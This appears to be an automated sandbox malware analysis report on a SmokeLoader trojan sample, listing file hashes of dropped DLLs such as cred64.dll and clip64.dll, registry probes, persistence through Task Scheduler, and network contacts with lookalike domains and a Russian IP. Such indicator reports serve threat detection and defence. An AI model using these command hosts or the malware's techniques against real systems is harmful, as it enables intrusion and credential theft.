memory/2932-387-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2484-393-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2832-394-0x000000006EDE0000-0x000000006F38B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\461186416230

MD5 d0ba858fef58669fbe660841cc1a6157
SHA1 224cb30a7779391b616e5bfae06a8a24b726adcb
SHA256 a3dd9a8710e1f41dc5d6e8cd6e1744aa367826cb740077e22df7a6e05bf37a07
SHA512 c19800e63d295e09e6c277222c846ae3cfc4e8c3e9a278c0e620657d035d6b69b267ab2ba27a4d3f30dd332f8da74b8b0b07ed63fcb5c7ec11eaffde4fa057a5

memory/832-402-0x0000000072880000-0x0000000072F6E000-memory.dmp

memory/1188-408-0x00000000008F0000-0x00000000009F0000-memory.dmp

memory/832-416-0x0000000009270000-0x00000000092B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 cb253bf8a6859eadd30b4ceb66c6a588
SHA1 7e9383d51ec36a019b5884f79a2ac2c05b4049bd
SHA256 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722
SHA512 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 4876ee75ce2712147c41ff1277cd2d30
SHA1 3733dc92318f0c6b92cb201e49151686281acda6
SHA256 bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed
SHA512 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 fda0cdaf875e4daf0c482875f5a231e6
SHA1 459bd14e4b5773b333f134d4d70bcf4b94e4ece2
SHA256 b85f8c66e7ccbcf27c5b06c463d3f1fe2b5511406edbf2eaba123a6ad4aad5ed
SHA512 b6dc77346f4a35a8d0808d2cbcfbcec03867c4d76d1dc488ee68b3574b45af6694f5d525047f271826f74b9993c3ad58d591e520b2808543171510f0a2af26da

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 646474805e0a482a64c8fb0fd24cc193
SHA1 e0f3f06273ece606c9f652b446473dcc90525279
SHA256 a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd
SHA512 b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 01a5858b5db7ecf9f3e7c5e6fd1444ca
SHA1 357d16d31867dba1119e78df7ba8559a5b6b9e24
SHA256 c14af4fa1c3a9df74306483ccee122ad9dc6849078038279db3996c02b5fc349
SHA512 5c6f53958c33b53e166ae52fe7707cf86f158bc7f2e0bbc04ecf98f6486babf18781c5a251eb2a68f629c69f17a6c80c05162fdde4a58e48853d1b22490fddbb

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 5bd578971972e12323f2c4033f52d7a2
SHA1 66253c74011718950a6425c61e81ccc4ef906f0f
SHA256 f0e2ed19ddddd7e5a6e46358e74088bce72d1e6028ea2db081dc311e5484f449
SHA512 2b1ccf5dff72b3a351613819a9437cf0d3aa6e8036029e1a2f5f1636cb9ab0ced399ef70cac7d30ef2f8edabe644df9d09f39121dec4463dd521a700ea099e17

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 d605ca01b165bd905586b87c5c89c276
SHA1 092572262fb11c44cac1a51de3b2e2c26842ea68
SHA256 f9f4ccdf63431abd99696354a89696e1b53f062921c44a005f486a3e6e45346b
SHA512 243f04c10c7d2aff46a8b9700bcd23f7d2a42687279c685e6239f673683fae6a0685838dd6ac4ea4eaf78c8b64c7d0b88f4d4ce93e85161dada030aae70e5063

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 c7e050428b9fa0683592b7b62064e87d
SHA1 c780fed59c78e33d85610290c84043a529af9b08
SHA256 e7bd37cd12fbf47e317815c366e51f59b713ba8b55f9bf258381d6a934614df9
SHA512 a4155e248240397f19696a53eb0638a2618e41c46f2c59899e44e0f407dbfa2265ee5ea329d988b47c40de420177a9c01a40c77788229fc200811b9689b3b825

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPTK2T6EEJKO4F1ZGR09.temp

MD5 61cd8de64ade8138ac9f87c1922e1426
SHA1 71a043d8591bd470b63f69af1a49dd365a18d07b
SHA256 3e9f3c51cf7be1d0566d3898363c96ffb33a3ac1e29a69c7e9b4ca0b6cdf887b
SHA512 048e9ac720f57bf74b584e25b7f759d4fc5a5791a8fc18f516dd02ffee541d975cba47e18f0ee14753cfda78f51674099090a3ec0dc221e98bd8e94622c55b42

memory/744-451-0x000000001B2B0000-0x000000001B592000-memory.dmp

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

MD5 ca684dc5ebed4381701a39f1cc3a0fb2
SHA1 8c4a375aa583bd1c705597a7f45fd18934276770
SHA256 b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2
SHA512 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 00:59

Reported

2024-03-15 01:04

Platform

win10-20240221-en

Max time kernel

299s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\thdutdt N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\thdutdt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\thdutdt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\thdutdt N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\thdutdt N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

C:\Users\Admin\AppData\Roaming\thdutdt

C:\Users\Admin\AppData\Roaming\thdutdt

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 197.159.94.81.in-addr.arpa udp
US 8.8.8.8:53 tradein-myus.com udp
US 8.8.8.8:53 trade-inmyus.com udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\thdutdt

MD5 15fbdb93344afb1b663ace05ee0d40c1
SHA1 03cc060e4c749212cdbce07aeed5623e4f94c27e
SHA256 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
SHA512 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb
